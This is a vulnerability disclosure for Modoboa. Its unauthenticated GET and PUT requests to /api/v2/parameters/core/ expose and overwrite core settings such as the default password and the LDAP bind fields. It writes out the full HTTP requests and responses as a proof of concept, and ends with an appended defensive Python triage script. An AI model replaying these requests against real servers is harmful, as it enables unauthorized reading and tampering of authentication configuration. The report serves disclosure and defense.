Improper Authorization in modoboa/modoboa
Reported on
Feb 25th 2023
Description
During testing, it was observed that sending an unauthenticated GET request to the endpoint /api/v2/parameters/core/ returns sensitive configuration data without any authentication or authorization check.
Request
GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}
The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system. This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the same parameters returned by the GET request can be modified, again without authentication, using a PUT request to the same endpoint.
Request
PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close
{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}
Response
HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
Proof of Concept
Impact
The impact of this vulnerability is severe, as it allows an attacker to gain sensitive information and modify it, posing a significant risk to the confidentiality and integrity of the system and its users' data. It is critical to address this vulnerability immediately to prevent any further exploitation by malicious actors.
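As an added example (not part of the report or of the Modoboa project), a small Python triage helper for an operator of an exposed instance: it takes a trimmed excerpt of the GET response body above, separates credential parameters that held a real value (to rotate) from those that were empty, and lists which credential parameters a given PUT body would alter, so that such writes can be flagged. The key-name patterns and the exclusion list of policy-only settings are my assumptions.

```python
import json
import re

# Trimmed excerpt of the JSON body the unauthenticated GET returned (values as in the report).
LEAKED_BODY = (
    '{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt",'
    '"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"",'
    '"ldap_bind_dn":"","ldap_bind_password":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"",'
    '"ldap_password_attribute":"userPassword","sms_password_recovery":false,'
    '"sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null,'
    '"sender_address":"noreply@yourdomain.test","items_per_page":30}}'
)

# Assumed name patterns that mark a parameter as a credential or secret.
SECRET_KEY = re.compile(r"password|secret|_key$|bind_dn", re.IGNORECASE)
# Parameters whose names match the pattern but hold policy settings, not credentials (assumption).
NOT_A_SECRET = {"password_scheme", "update_password_url", "password_recovery_msg",
                "sms_password_recovery", "ldap_password_attribute", "random_password_length"}

def is_secret_param(name):
    return name not in NOT_A_SECRET and SECRET_KEY.search(name) is not None

def triage_leak(body):
    """Return (credential params that held a value -> rotate now, credential params that were unset)."""
    params = json.loads(body)["params"]
    exposed = sorted(k for k, v in params.items() if is_secret_param(k) and v not in ("", None))
    unset = sorted(k for k, v in params.items() if is_secret_param(k) and v in ("", None))
    return exposed, unset

def sensitive_changes(current_body, put_body):
    """Credential params that a PUT body would change relative to the current settings."""
    current = json.loads(current_body)["params"]
    proposed = json.loads(put_body)
    return sorted(k for k, v in proposed.items() if is_secret_param(k) and current.get(k) != v)

if __name__ == "__main__":
    exposed, unset = triage_leak(LEAKED_BODY)
    print("rotate now:", exposed)
    print("unset at time of leak:", unset)
    # Constructed PUT body that rewrites two credential parameters; a monitor should flag this write.
    put = json.dumps({"default_password": "changed", "ldap_bind_dn": "cn=x", "items_per_page": 50})
    print("credential params changed by PUT:", sensitive_changes(LEAKED_BODY, put))
```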
References
@Maintainer @Admin
Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories